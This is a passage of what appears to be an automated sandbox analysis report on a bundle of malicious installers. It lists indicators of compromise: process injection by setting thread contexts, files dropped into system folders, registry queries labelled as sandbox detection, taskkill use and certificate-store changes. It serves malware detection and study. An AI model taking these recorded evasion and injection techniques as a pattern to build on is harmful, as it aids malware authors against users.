description pid Process procid_target PID 3644 set thread context of 4968 3644 svchost.exe 163 PID 6460 set thread context of 6528 6460 RunWW.exe 224 PID 6676 set thread context of 4608 6676 XOoRXgN90WGr.exe 363 PID 5244 set thread context of 4392 5244 5241308.exe 402 PID 6760 set thread context of 5656 6760 Infinita.exe.com 440 PID 7940 set thread context of 2172 7940 Cio.exe.com 463 PID 6800 set thread context of 4012 6800 key.exe 476 PID 3968 set thread context of 7920 3968 keygen-step-2.exe 484 PID 5076 set thread context of 9144 5076 111.exe 613 PID 7696 set thread context of 8544 7696 7BEF.tmp.exe 578 PID 8024 set thread context of 9252 8024 app.exe 580 PID 8024 set thread context of 9556 8024 app.exe 635 PID 9596 set thread context of 8384 9596 timeout.exe 636 PID 5864 set thread context of 9028 5864 2DDB.tmp.exe 637 PID 5896 set thread context of 10072 5896 2BB7.tmp.exe 639 PID 5864 set thread context of 6072 5864 2DDB.tmp.exe 650 PID 8912 set thread context of 10572 8912 libmfxsw32.exe 667 PID 584 set thread context of 5468 584 libmfxsw32.exe 669 PID 4024 set thread context of 10428 4024 libmfxsw32.exe 682 -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\MaskVPN\driver\win732\is-3QL8A.tmp vpn.tmp File opened for modification C:\Program Files (x86)\Installation V156\mrmsupport.dll jfiag3g_gg.exe File opened for modification C:\Program Files\unins0000.vbs Full Version.exe File opened for modification C:\Program Files (x86)\i-record\avfilter-2.dll irecord.tmp File created C:\Program Files (x86)\Picture Lab\is-CBHR8.tmp prolab.tmp File created C:\Program Files (x86)\MaskVPN\unins000.dat vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-JHS7B.tmp vpn.tmp File created C:\Program Files\Common Files\UJCHJUYILS\irecord.exe ysAGEL.exe File opened for modification C:\Program Files (x86)\Installation V156\JavaAccessBridge-32.dll jfiag3g_gg.exe File opened for modification C:\Program Files (x86)\MaskVPN\libMaskVPN.dll vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-SVQMI.tmp vpn.tmp File created C:\Program Files\api-ms-win-crt-string-l1-1-0.dll guihuali-game.exe File created C:\Program Files\pdfsetup.dat google-game.exe File opened for modification C:\Program Files (x86)\Advanced Trip\images\gadget_bg.png setup_10.2_mix.exe File opened for modification C:\Program Files (x86)\MaskVPN\MaskVPN.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-HGI6D.tmp vpn.tmp File created C:\Program Files (x86)\Picture Lab\unins000.dat prolab.tmp File created C:\Program Files (x86)\i-record\is-GHK0Q.tmp irecord.tmp File opened for modification C:\Program Files (x86)\Installation V156\libmpc-3.dll jfiag3g_gg.exe File opened for modification C:\Program Files (x86)\MaskVPN\tunnle.exe vpn.tmp File opened for modification C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Uninstall.exe Setup.exe File created C:\Program Files (x86)\i-record\is-SMSTN.tmp irecord.tmp File created C:\Program Files (x86)\MaskVPN\is-BTI5F.tmp vpn.tmp File opened for modification C:\Program Files (x86)\Installation V156\libobjc-4.dll jfiag3g_gg.exe File opened for modification C:\Program Files\unins0000.dll Full Version.exe File created C:\Program Files (x86)\MaskVPN\is-OUMPC.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-Q2RJQ.tmp vpn.tmp File opened for modification C:\Program Files (x86)\Installation V156\stdvcl40.dll jfiag3g_gg.exe File created C:\Program Files (x86)\Installation V156\unins000.dat jfiag3g_gg.exe File opened for modification C:\Program Files\jp2iexp.dll Full Version.exe File created C:\Program Files (x86)\Picture Lab\is-DBDMS.tmp prolab.tmp File created C:\Program Files (x86)\Installation V156\is-6849H.tmp jfiag3g_gg.exe File opened for modification C:\Program Files (x86)\MaskVPN\driver\winxp64\devcon.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-0HSM9.tmp vpn.tmp File created C:\Program Files\unins0000.dat guihuali-game.exe File created C:\Program Files (x86)\MaskVPN\driver\win732\is-ASGGO.tmp vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-GQPD1.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-FR3PG.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-BA4NO.tmp vpn.tmp File opened for modification C:\Program Files (x86)\i-record\swresample-0.dll irecord.tmp File opened for modification C:\Program Files (x86)\Advanced Trip\images\gadget_button_0_normal.png setup_10.2_us3.exe File created C:\Program Files (x86)\i-record\is-5CM09.tmp irecord.tmp File opened for modification C:\Program Files (x86)\Installation V156\d3dcompiler_47.dll jfiag3g_gg.exe File opened for modification C:\Program Files (x86)\Installation V156\javafx_iio.dll jfiag3g_gg.exe File opened for modification C:\Program Files (x86)\i-record\i-record.exe irecord.tmp File opened for modification C:\Program Files (x86)\i-record\avformat-53.dll irecord.tmp File created C:\Program Files (x86)\Installation V156\is-1NBOD.tmp jfiag3g_gg.exe File created C:\Program Files (x86)\Installation V156\is-VL7E0.tmp jfiag3g_gg.exe File opened for modification C:\Program Files (x86)\Advanced Trip\Gadget.Xml setup_10.2_us3.exe File opened for modification C:\Program Files (x86)\MaskVPN\driver\winxp32\devcon.exe vpn.tmp File created C:\Program Files\Common Files\UJCHJUYILS\irecord.exe.config ysAGEL.exe File opened for modification C:\Program Files (x86)\Picture Lab\AForge.Math.dll prolab.tmp File created C:\Program Files (x86)\i-record\is-NSF76.tmp irecord.tmp File created C:\Program Files (x86)\MaskVPN\is-73Q2F.tmp vpn.tmp File opened for modification C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe Setup.exe File created C:\Program Files (x86)\Picture Lab\is-7QC27.tmp prolab.tmp File created C:\Program Files\unins0000.vbs Full Version.exe File created C:\Program Files\jp2iexp.dll google-game.exe File opened for modification C:\Program Files (x86)\Advanced Trip\DreamTrip.exe setup_10.2_us3.exe File created C:\Program Files (x86)\MaskVPN\driver\win732\is-3EQ3M.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-ARCAK.tmp vpn.tmp File opened for modification C:\Program Files (x86)\Installation V156\mfdetours.dll jfiag3g_gg.exe File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-UM6O3.tmp vpn.tmp -
Drops file in Windows directory 39 IoCs
description ioc Process File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File opened for modification C:\Windows\inf\oem2.inf DrvInst.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe File opened for modification C:\Windows\Installer\f756a25.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI8FE6.tmp msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} msiexec.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new Geqymilace.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new Geqymilace.exe File opened for modification C:\Windows\Installer\MSI14C4.tmp msiexec.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File created C:\Windows\Installer\f756a25.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI7716.tmp msiexec.exe File created C:\Windows\Tasks\.job aipackagechainer.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File opened for modification C:\Windows\Installer\MSI6EA9.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI77B4.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8CE5.tmp msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log jfiag3g_gg.exe File opened for modification C:\Windows\Tasks\.job svchost.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File opened for modification C:\Windows\Installer\MSI7A17.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8DC1.tmp msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log svchost.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe File opened for modification C:\Windows\Installer\MSI7B41.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI91DC.tmp msiexec.exe File created C:\Windows\INF\oem2.PNF DrvInst.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe File opened for modification C:\Windows\Installer\MSI7756.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8EAC.tmp msiexec.exe File created C:\Windows\inf\oem2.inf DrvInst.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
pid pid_target Process procid_target 2164 7920 WerFault.exe 484 6652 8852 WerFault.exe 596 -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Phantom DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\UpperFilters DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID taskkill.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Mfg svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs jfiag3g_gg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 6762a766.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Capabilities svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 jfiag3g_gg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags jfiag3g_gg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Capabilities svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\LowerFilters DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 6762a766.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Phantom DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Service DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 svchost.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 6762a766.exe -
Checks processor information in registry 2 TTPs 16 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RunWW.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RunWW.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wwfvd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Weather.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 2BB7.tmp.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 5.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wwfvd.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Weather.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 7BEF.tmp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 7BEF.tmp.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 DC30.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString DC30.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 2BB7.tmp.exe -
Delays execution with timeout.exe 10 IoCs
pid Process 7240 timeout.exe 9596 timeout.exe 6572 timeout.exe 6012 timeout.exe 5724 timeout.exe 5492 timeout.exe 8432 timeout.exe 3952 timeout.exe 3444 timeout.exe 7064 timeout.exe -
Enumerates system info in registry 2 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS multitimer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer multitimer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe -
Kills process with taskkill 14 IoCs
pid Process 10424 taskkill.exe 5588 taskkill.exe 1116 taskkill.exe 10688 taskkill.exe 7360 taskkill.exe 5232 taskkill.exe 8068 taskkill.exe 5628 taskkill.exe 9736 taskkill.exe 4040 taskkill.exe 2356 taskkill.exe 9312 taskkill.exe 5524 taskkill.exe 4804 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot 6762a766.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2842 = "Saratov Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" app.exe Key created \REGISTRY\USER\.DEFAULT\Software\PegasPc file.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-342 = "Egypt Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local 